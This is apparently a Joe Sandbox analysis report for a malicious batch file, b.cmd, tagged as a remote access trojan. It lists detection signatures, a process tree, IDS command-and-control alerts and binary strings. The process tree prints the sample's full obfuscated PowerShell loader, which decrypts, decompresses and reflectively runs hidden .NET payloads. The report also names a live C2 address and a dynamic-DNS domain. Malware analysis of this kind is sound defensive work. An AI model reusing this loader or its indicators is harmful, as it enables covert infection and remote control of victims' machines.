Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
b.cmd

Overview

General Information

Sample name:b.cmd
Analysis ID:1542729
MD5:22f8f4191985b660d43620eb8d56dc57
SHA1:f44ff1478083e15c97231eafc098af44f728aa02
SHA256:91867f295ac459c82807864841770842cd2f4b254af3f3eb36c74438dff2c8a0
Tags:CloudflareTunnelsRATcmduser-JAMESWT_MHT
Infos:

Detection

Score:84
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Obfuscated command line found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Suspicious powershell command line found
Uses dynamic DNS services
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

  • System is w10x64
  • cmd.exe (PID: 6304 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\b.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 5772 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • cmd.exe (PID: 5496 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6108 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 3120 cmdline: cmd /c \"set __=^&rem\ MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • cmd.exe (PID: 3168 cmdline: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\user\Desktop\b.cmd';$rWNT='DecpxHCopxHCmppxHCrespxHCspxHC'.Replace('pxHC', ''),'MaTGyrinTGyrMTGyroTGyrdTGyrulTGyreTGyr'.Replace('TGyr', ''),'CrYsKteYsKtateYsKtDYsKteYsKtcrYsKtypYsKttoYsKtrYsKt'.Replace('YsKt', ''),'Idnlzndnlzvdnlzokdnlzednlz'.Replace('dnlz', ''),'TraGoiknsfGoikoGoikrmFGoikinaGoiklBlGoikockGoik'.Replace('Goik', ''),'LoStkNadStkN'.Replace('StkN', ''),'FroMxWcmBaMxWcse6MxWc4StMxWcriMxWcngMxWc'.Replace('MxWc', ''),'EnrgYjtrrgYjyrgYjPorgYjinrgYjtrgYj'.Replace('rgYj', ''),'CqJGUopqJGUyqJGUTqJGUoqJGU'.Replace('qJGU', ''),'ElywTEeywTEmenywTEtAywTEtywTE'.Replace('ywTE', ''),'ReaMpXgdLMpXgineMpXgsMpXg'.Replace('MpXg', ''),'CeuHLheuHLangeuHLeExeuHLteeuHLnseuHLioneuHL'.Replace('euHL', ''),'SKlTEpliKlTEtKlTE'.Replace('KlTE', ''),'GzasmetzasmCuzasmrrzasmentzasmPrzasmocezasmszasmszasm'.Replace('zasm', '');powershell -w hidden;function OgEIm($Xyfkn){$KStrb=[System.Security.Cryptography.Aes]::Create();$KStrb.Mode=[System.Security.Cryptography.CipherMode]::CBC;$KStrb.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$KStrb.Key=[System.Convert]::($rWNT[6])('xA1+WTJaPCUsOeL/aM8gYjpdFXCHAzsSe7O9jqgG6tE=');$KStrb.IV=[System.Convert]::($rWNT[6])('o+k4tdVDsXdevRbseXqo5Q==');$OoABI=$KStrb.($rWNT[2])();$gCRFY=$OoABI.($rWNT[4])($Xyfkn,0,$Xyfkn.Length);$OoABI.Dispose();$KStrb.Dispose();$gCRFY;}function bkQvC($Xyfkn){$pXxPg=New-Object System.IO.MemoryStream(,$Xyfkn);$ztkwM=New-Object System.IO.MemoryStream;$RxDER=New-Object System.IO.Compression.GZipStream($pXxPg,[IO.Compression.CompressionMode]::($rWNT[0]));$RxDER.($rWNT[8])($ztkwM);$RxDER.Dispose();$pXxPg.Dispose();$ztkwM.Dispose();$ztkwM.ToArray();}$QaWhK=[System.IO.File]::($rWNT[10])([Console]::Title);$TOEth=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 5).Substring(2))));$kobGz=bkQvC (OgEIm ([Convert]::($rWNT[6])([System.Linq.Enumerable]::($rWNT[9])($QaWhK, 6).Substring(2))));[System.Reflection.Assembly]::($rWNT[5])([byte[]]$kobGz).($rWNT[7]).($rWNT[3])($null,$null);[System.Reflection.Assembly]::($rWNT[5])([byte[]]$TOEth).($rWNT[7]).($rWNT[3])($null,$null); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • powershell.exe (PID: 1800 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe MD5: 04029E121A0CFA5991749937DD22A1D9)
        • powershell.exe (PID: 3624 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\system32\cmd.exe /K "C:\Users\user\Desktop\b.cmd" , ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 5496, ParentProcessName: cmd.exe, ProcessCommandLine: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 1800, ProcessName: powershell.exe
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-26T08:51:31.380832+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:51:41.905177+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:51:46.067340+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:00.757563+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:11.907007+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:15.438912+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:18.469264+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:20.187649+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:23.631494+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:28.870044+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:29.360012+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:30.430971+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:33.993102+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:34.133769+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:34.242315+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:41.908748+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:43.392634+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:44.236122+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:44.361105+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:44.422913+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:44.491780+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:44.747195+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:49.733611+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:50.921310+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:53.999681+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:54.880461+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:55.053528+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:59.966453+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:00.028670+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:00.045747+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:00.076089+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:00.083376+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:00.163384+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:03.091908+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:10.278524+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:11.887538+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:20.601582+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:25.684151+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:30.913282+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:31.030649+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:31.147691+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:31.336532+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:32.476799+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:33.961008+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:36.616631+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:36.734613+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:36.854293+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:41.995606+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:42.503843+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:42.632949+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:52.741987+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:52.859064+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:52.943970+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:52.960276+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:52.976127+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:53.289174+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:56.390663+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:58.676357+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:02.665776+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:07.668156+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:08.507500+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:08.624469+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:08.753563+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:11.912869+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:23.336560+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:24.211211+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:34.462621+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:34.580319+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:35.258186+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:35.956947+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:38.992547+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:41.908904+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:42.164751+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:44.724773+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:44.843354+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:49.040667+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:54.882756+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:54.999825+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:01.977422+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:04.382703+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:04.992424+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:05.093553+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:05.109200+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:05.226404+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:10.062538+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:12.211600+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:12.211666+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:24.727210+020028528701Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-26T08:51:31.606047+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:51:46.077208+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:00.761855+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:15.440755+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:18.473454+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:20.189371+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:23.633999+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:28.872153+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:29.368529+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:30.433021+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:33.997377+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:34.135697+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:34.184661+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:34.192609+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:34.244152+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:43.397341+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:44.238238+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:44.362969+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:44.427220+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:44.499829+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:44.751256+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:49.736759+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:50.923858+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:54.002242+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:54.884005+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:55.056128+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:52:59.971039+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:00.030487+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:00.046992+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:00.077688+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:00.133615+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:00.164856+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:03.097657+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:10.281806+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:20.604015+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:25.689628+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:30.915218+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:31.032233+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:31.149558+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:31.337967+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:32.478538+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:33.963068+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:36.619425+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:36.735834+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:36.857389+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:42.505494+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:42.634493+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:52.746689+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:52.864194+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:52.947376+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:52.966537+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:52.980186+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:53.295160+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:56.392838+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:53:58.678258+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:02.667429+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:07.676210+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:08.510187+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:08.625811+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:08.754877+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:23.344229+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:24.215005+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:34.465448+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:34.583186+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:35.261598+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:35.959915+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:39.000265+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:42.166457+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:44.726261+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:44.844727+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:49.049263+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:54.885849+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:54:55.004059+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:01.979041+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:04.384220+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:04.995620+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:05.099330+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:05.111333+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:05.228286+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:10.063221+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
2024-10-26T08:55:24.728281+020028529231Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-26T08:51:41.905177+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:11.907007+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:52:41.908748+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:11.887538+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:53:41.995606+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:11.912869+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:54:41.908904+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:12.211600+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
2024-10-26T08:55:12.211666+020028528741Malware Command and Control Activity Detected101.99.92.2037000192.168.2.449732TCP
TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2024-10-26T08:52:44.169598+020028531931Malware Command and Control Activity Detected192.168.2.449732101.99.92.2037000TCP

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: dcxwq1.duckdns.orgVirustotal: Detection: 12%Perma Link
Source: b.cmdReversingLabs: Detection: 23%
Source: Submited SampleIntegrated Neural Analysis Model: Matched 87.3% probability
Source: Binary string: e.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.PowerShell.PSReadLine.PDB source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Program Files\WindowsPowerShell\Modules\PSReadline\2.0.0\Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: .pdbY source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdba source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Nf.pdbA source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.Powershell.PSReadline.pdb source: powershell.exe, 00000008.00000002.1774654668.000001FCBF8FB000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: G_FORCE_FREE_LIBRARY.pdb source: powershell.exe, 00000008.00000002.1775392519.000001FCBFBB0000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Globalization\Sorting\sortdefault.nlsJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\MSVFW32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SYSTEM32\en-US\avicap32.dll.muiJump to behavior
